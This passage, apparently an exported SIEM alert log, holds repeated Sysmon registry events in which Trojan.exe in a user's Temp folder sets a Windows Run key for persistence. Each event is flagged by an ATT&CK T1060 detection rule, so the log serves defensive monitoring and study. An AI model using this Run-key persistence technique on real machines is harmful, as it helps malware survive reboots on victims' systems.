..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:27:57.933372800Z"",""eventRecordID"":""2036"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:27:57.918\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:27:57.918"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:28:00.305",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:27:56.902 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:27:56.905917100Z"",""eventRecordID"":""2035"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:27:56.902\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:27:56.902"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:27:59.274",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:27:55.887 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:27:55.897492300Z"",""eventRecordID"":""2034"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:27:55.887\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:27:55.887"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John 
Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:27:57.417",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:27:54.871 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:27:54.887455400Z"",""eventRecordID"":""2033"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:27:54.871\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:27:54.871"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:27:57.351",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:27:53.855 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:27:53.910999700Z"",""eventRecordID"":""2032"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:27:53.855\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:27:53.855"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:27:56.341",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:27:52.840 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:27:52.856114500Z"",""eventRecordID"":""2031"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:27:52.840\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:27:52.840"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John 
Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:27:55.226",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:27:51.824 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:27:51.842125900Z"",""eventRecordID"":""2030"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:27:51.824\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:27:51.824"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:27:54.164",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:27:50.793 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:27:50.799672700Z"",""eventRecordID"":""2029"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:27:50.793\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:27:50.793"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:27:53.164",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:27:49.778 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:27:49.792725200Z"",""eventRecordID"":""2028"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:27:49.778\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:27:49.778"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John 
Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:27:51.156",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:27:48.730 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:27:48.740056300Z"",""eventRecordID"":""2027"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:27:48.730\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:27:48.730"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:27:51.138",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:27:47.699 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:27:47.730915000Z"",""eventRecordID"":""2026"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:27:47.699\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:27:47.699"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:27:50.102",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:27:46.684 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 